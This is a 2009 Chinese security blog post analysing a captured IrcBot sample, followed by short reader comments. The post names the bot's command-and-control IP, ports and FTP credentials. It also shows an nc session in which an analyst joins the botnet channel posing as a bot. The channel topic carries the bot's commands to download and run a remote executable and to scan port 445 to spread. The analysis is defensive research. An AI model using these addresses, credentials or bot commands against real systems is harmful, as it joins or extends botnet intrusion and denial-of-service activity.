|
|
 |
| 碰见个IrcBot |
| Submitted by 云舒 on 2009, December 3, 1:33 PM. 技术
|
前几天无意中捡到一个IrcBot,PECompact 2.X加壳的。执行后创建服务,扫描IPC和SQL Server若密码试图传播。一直以为中国人不喜欢搞IRC的,看来还是有啊。这个Bot可以做SYN攻击和UDP攻击,IRC服务器是60.10.179.100:8280,还有个FTP服务器运行在60.10.179.100:2121,帐号密码都是123,http://60.10.179.100:15555/运行着一个HFS服务。
补充:我把逆向出来的结果给我们的harry同学了,他下午研究了下,最终跑进IRC了。
$ nc -v rose.linkpc.net 8280
Warning: inverse host lookup failed for 60.10.179.100: Unknown host
rose.linkpc.net [60.10.179.100] 8280 (?) open
PASS lol
NICK CHN|XP|SP2|01827162
USER chn * 0: chn
PING :D9839FD2
PONG :D9839FD2
:. 004 CHN|XP|SP2|01827162
:. 005 CHN|XP|SP2|01827162 :
:. 005 CHN|XP|SP2|01827162 :
:. 005 CHN|XP|SP2|01827162 :
JOIN #tsunami3
:CHN|XP|SP2|01827162!chn@65.99.199.216 JOIN :#tsunami3
:. 332 CHN|XP|SP2|01827162 #tsunami3 :|.ddosstop -s|.stop -s|.shttp http://60.10.179.100:15555/2.exe -s|.asc net445 100 5 9999 -b -r -s
:. 333 CHN|XP|SP2|01827162 #tsunami3 ssss 1259808419
:. 353 CHN|XP|SP2|01827162 @ #tsunami3 :CHN|XP|SP2|01827162
:. 366 CHN|XP|SP2|01827162 #tsunami3 :End of /NAMES list.
|
|
|
http://www.yydm.com/thread-72719-1-1.html
|
Post by 丰初 on 2009, December 3, 1:54 PM
|
| 恩,确实是这个。 |
Post by 云舒 on 2009, December 3, 2:09 PM
|
每天碰到N多...
大多来至 东欧 巴西 韩国 |
Post by x9x9x9 on 2009, December 3, 2:47 PM
|
| 好多年没看到过ircbot了啊…… |
Post by blackfox on 2009, December 4, 2:34 PM
|
| 我记得很多年以前你还有一个修改过的IrcBot,那时候你还有个主页。 |
Post by 云舒 on 2009, December 4, 3:59 PM
|
| 呵呵,其实IRC还是很好玩的,偶就公开过一个IRC客户端 |
Post by 天涯浪人 on 2010, March 30, 7:13 PM
|
|
